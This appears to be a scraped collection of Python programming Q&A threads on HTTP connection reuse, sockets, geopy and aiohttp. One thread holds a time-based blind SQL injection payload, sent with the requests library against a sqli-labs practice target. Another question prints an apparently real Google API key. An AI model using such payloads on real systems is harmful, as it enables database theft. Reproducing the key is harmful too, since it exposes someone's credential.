Perform handshake only once - python-3.x

I use urllib.request.urlopen to fetch data from a server over HTTPS. The function is called a lot against the same server, often for the exact same URL. However, unlike standard web browsers, which perform a handshake only on the initial request, each separate urlopen(url) call performs a new handshake. This is very slow on high-latency networks. Is there a way to perform the handshake once and reuse the existing connection for further communication?
I cannot modify server code to utilise sockets or other protocols.

You are opening a new connection for every request. To reuse the connection, you can either use http.client directly:
>>> import http.client
>>> conn = http.client.HTTPSConnection("www.python.org")
>>> conn.request("GET", "/")
>>> r1 = conn.getresponse()
>>> print(r1.status, r1.reason)
200 OK
>>> data1 = r1.read()  # This will return the entire content.
>>> # The following example demonstrates reading data in chunks.
>>> conn.request("GET", "/")
>>> r1 = conn.getresponse()
>>> while not r1.closed:
...     print(r1.read(200))  # Read 200 bytes at a time.
b'<!doctype html>\n<!--[if"...
...
>>> # Example of an invalid request
>>> conn.request("GET", "/parrot.spam")
>>> r2 = conn.getresponse()
>>> print(r2.status, r2.reason)
404 Not Found
>>> data2 = r2.read()
>>> conn.close()
Or use the recommended Requests package for Python, which has Session objects that make use of persistent connections (via urllib3).
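For example, a minimal sketch of reusing one connection with a requests Session (python.org is just a placeholder host):
import requests

# One Session keeps the underlying TCP/TLS connection alive (via urllib3),
# so the TLS handshake happens only on the first request.
with requests.Session() as session:
    r1 = session.get('https://www.python.org/')
    r2 = session.get('https://www.python.org/')  # reuses the same connection
    print(r1.status_code, r2.status_code)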

HTTP(S) is stateless, so by default each request opens a new socket to the server; there is no way around this with plain urlopen. I searched around for ways to open a persistent connection, though, and found the following, which I hope helps (it is about urllib2):
Persistent HTTPS Connections in Python

Related

Python3 http request close connection when nothing is sent

I have an API with the following behavior:
You make a POST request and it returns "n" lines of data:{json}
It keeps the connection open for at least 300 seconds, even when nothing is being sent.
As this is very slow, I want to find a way to close the connection when it is not sending anything, or after a timer.
So, yes, it was easier than I thought. I'm going to copy-paste my code here, using the http.client library:
import http.client
import json

def asyncCall(url, data=None, timeout=300):
    conn = http.client.HTTPConnection(IP, timeout=timeout)  # IP is defined elsewhere
    conn.request("POST", url, bytes(json.dumps(data), encoding="utf-8"))
    r1 = conn.getresponse()
    while not r1.closed:
        l = r1.readline().decode("utf-8")
        yield l
This way, it can pass each line to a callback (which runs in a separate process) and close the connection after the timeout.
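A hypothetical way to consume this generator (the endpoint, payload, and handle_line callback below are placeholders): once the server goes quiet for longer than the timeout, reading raises socket.timeout and the loop stops.
import socket

try:
    for line in asyncCall("/stream", data={"q": "test"}, timeout=10):
        handle_line(line)  # placeholder for the callback run in a separate process
except socket.timeout:
    pass  # nothing received within `timeout` seconds; stop waiting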

Python Requests.response.elapsed clarification [duplicate]

I am trying to induce an artificial delay in the HTTP response from a web application (this is a technique used to do blind SQL injections). If the HTTP request below is sent from a browser, the response from the web server comes back after 3 seconds (caused by sleep(3)):
http://192.168.2.15/sqli-labs/Less-9/?id=1'+and+if+(ascii(substr(database(),+1,+1))=115,sleep(3),null)+--+
I am trying to do the same in Python 2.7 using the requests library. The code I have is:
import requests
payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) --+"}
r = requests.get('http://192.168.2.15/sqli-labs/Less-9', params=payload)
roundtrip = r.elapsed.total_seconds()
print roundtrip
I expected the roundtrip to be 3 seconds, but instead I get values like 0.001371, 0.001616, 0.002228, etc. Am I not using the elapsed attribute properly?
elapsed measures the time between sending the request and finishing parsing the response headers, not until the full response has been transferred.
If you want to measure that time, you need to measure it yourself:
import requests
import time
payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) --+"}
start = time.time()
r = requests.get('http://192.168.2.15/sqli-labs/Less-9', params=payload)
roundtrip = time.time() - start
print roundtrip
I figured out that my payload should have been
payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) -- "}
The last character '+' in the original payload was being passed to the back-end database, resulting in invalid SQL syntax. I shouldn't have done any manual encoding in the payload.
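To confirm what actually gets sent, you can let requests show the final encoded URL. A quick sketch (the host is the one from the question; note this uses Python 3 print syntax):
import requests

payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) -- "}
prepared = requests.Request('GET', 'http://192.168.2.15/sqli-labs/Less-9',
                            params=payload).prepare()
print(prepared.url)  # requests percent-encodes the value, so no manual encoding is needed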

Error Using geopy library

I want to set up a routine that iterates over a pandas DataFrame to extract longitude and latitude data after supplying the address, using the geopy library.
The routine I created was:
import os
import time
import pandas as pd
from geopy.geocoders import GoogleV3

arquivo = pd.ExcelFile('path')
df = arquivo.parse("Table1")

def set_proxy():
    proxy_addr = 'http://{user}:{passwd}@{address}:{port}'.format(
        user='usuario', passwd='senha',
        address='IP', port=int('PORTA'))
    os.environ['http_proxy'] = proxy_addr
    os.environ['https_proxy'] = proxy_addr

def unset_proxy():
    os.environ.pop('http_proxy')
    os.environ.pop('https_proxy')

set_proxy()
geo_keys = ['AIzaSyBXkATWIrQyNX6T-VRa2gRmC9dJRoqzss0']  # Google API key
geolocator = GoogleV3(api_key=geo_keys)
for index, row in df.iterrows():
    location = geolocator.geocode(row['NO_LOGRADOURO'], timeout=10)
    time.sleep(2)
    lat = location.latitude
    lon = location.longitude
    address = location.address
    unset_proxy()
    print(str(lat) + ', ' + str(lon))
The problem I'm having is that when I run the code the following error is thrown:
GeocoderQueryError: Your request was denied.
I tried creating it without passing the Google API key; however, I get the following message:
KeyError: 'http_proxy'
And if I remove the unset_proxy() call from inside the for loop, the message I receive is:
GeocoderQuotaExceeded: The given key has gone over the requests limit in the 24 hour period or has submitted too many requests in too short a period of time.
But I have only made 5 requests today, and I'm putting a 2-second sleep between requests. Should the period be longer?
Any ideas?
The api_key argument of the GoogleV3 class must be a string, not a list of strings (that's the cause of your first issue).
geopy doesn't guarantee that the http_proxy/https_proxy environment variables are respected (especially runtime modifications of os.environ). The usage of proxies advised by the docs is:
geolocator = GoogleV3(proxies={'http': proxy_addr, 'https': proxy_addr})
PS: Please don't ever post your API keys publicly. I suggest revoking the key you've posted in the question and generating a new one, to prevent it from being abused by someone else.
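Putting both fixes together, a minimal corrected sketch (the key, proxy address, and query below are placeholders):
from geopy.geocoders import GoogleV3

proxy_addr = 'http://usuario:senha@IP:PORTA'  # placeholder proxy URL
geolocator = GoogleV3(
    api_key='YOUR-NEW-KEY',  # a single string, not a list
    proxies={'http': proxy_addr, 'https': proxy_addr},
)
location = geolocator.geocode('some address', timeout=10)
print(location.latitude, location.longitude)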

Receiving data only if sent python socket

I am writing a messenger application in Python and I have a problem. The problem is quite simple: I want the program to receive data from the other computer only if data was actually sent; otherwise, my program would wait for a data transfer forever. How would I write that piece of code? I imagine it'd be something like this:
try:
    data = s.recv(1024).decode()
except:
    data = None
See the select module. A socket can be monitored for readability with a timeout, so other processing can proceed.
Example server:
import socket
import select
with socket.socket() as server:
    server.bind(('', 5000))
    server.listen(3)
    to_read = [server]  # add server to list of readable sockets.
    clients = {}
    while True:
        # check for a connection to the server or data ready from clients.
        # readers will be empty on timeout.
        readers, _, _ = select.select(to_read, [], [], 0.5)
        for reader in readers:
            if reader is server:
                client, address = reader.accept()
                print('connected', address)
                clients[client] = address  # store address of client in dict
                to_read.append(client)     # add client to list of readable sockets
            else:
                # Simplified; really need a message protocol here.
                # For example, could receive a partial UTF-8 encoded sequence.
                data = reader.recv(1024)
                if not data:  # no data indicates disconnect
                    print('disconnected', clients[reader])
                    to_read.remove(reader)  # remove from monitoring
                    del clients[reader]     # remove from dict as well
                else:
                    print(clients[reader], data.decode())
        print('.', flush=True, end='')
A simple client, assuming your IP address is 1.2.3.4:
import socket
s = socket.socket()
s.connect(('1.2.3.4',5000))
s.sendall('hello'.encode())
s.close()
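If you only need the receiving side not to block forever, a simpler per-socket alternative is a timeout on recv. A minimal sketch, reusing the placeholder address from above:
import socket

s = socket.socket()
s.connect(('1.2.3.4', 5000))
s.settimeout(0.5)  # recv waits at most half a second
try:
    data = s.recv(1024).decode()
except socket.timeout:
    data = None  # nothing was sent within the timeout
s.close()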

TypeError('not a valid non-string sequence or mapping object',)

I am using an aiohttp GET request to download some content from another web API, but I am receiving:
exception = TypeError('not a valid non-string sequence or mapping object',)
Following is the data I am trying to send:
data = "symbols=LGND-US&exprs=CS_EVENT_TYPE_CD_R(%27%27,%27now%27,%271D%27)"
How do I resolve it?
I tried it in two ways:
r = yield from aiohttp.get(url, params=data)  # and
r = yield from aiohttp.post(url, data=data)
At the same time, I am able to fetch data using:
r = requests.get(url, params=data)  # and
r = requests.post(url, data=data)
But I need an async implementation.
Also, please suggest a way, if there is one, to use the requests library instead of aiohttp to make async HTTP requests, because in many cases aiohttp POST and GET requests do not work while the same requests work with requests.get and requests.post.
The docs use bytes (i.e. the 'b' prefix) for the data argument.
r = await aiohttp.post('http://httpbin.org/post', data=b'data')
Also, the params argument should be a dict or a list of tuples.
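For example, a sketch of the same request with params as a dict, so aiohttp does the URL encoding itself (this uses the ClientSession API; the URL is a placeholder):
import asyncio
import aiohttp

params = {
    'symbols': 'LGND-US',
    'exprs': "CS_EVENT_TYPE_CD_R('','now','1D')",
}

async def fetch(url):
    async with aiohttp.ClientSession() as session:
        async with session.get(url, params=params) as resp:
            return await resp.text()

print(asyncio.run(fetch('http://httpbin.org/get')))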
